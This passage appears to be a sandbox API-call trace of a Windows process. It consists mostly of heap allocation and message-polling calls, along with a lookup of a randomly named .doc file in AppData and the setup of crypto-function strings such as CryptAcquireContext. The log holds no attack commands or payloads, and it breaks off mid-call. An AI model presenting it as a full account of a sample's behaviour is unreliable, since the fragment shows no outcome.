RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0230.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0230.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0230.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0230.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0230.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0230.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0230.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0230.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0230.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.986] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FpHVdISbKXY46o.doc", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb40a45c0, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0xae0c73b0, ftLastAccessTime.dwHighDateTime=0x1d5e500, ftLastWriteTime.dwLowDateTime=0xae0c73b0, ftLastWriteTime.dwHighDateTime=0x1d5e500, nFileSizeHigh=0x0, nFileSizeLow=0xad28, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="FpHVdISbKXY46o.doc", cAlternateFileName="FPHVDI~1.DOC")) returned 0xa87390 [0230.986] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0230.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.987] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.987] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.987] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0230.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.987] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.988] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0230.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.988] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0230.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0230.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0230.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0230.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.990] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0230.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0230.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0230.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, 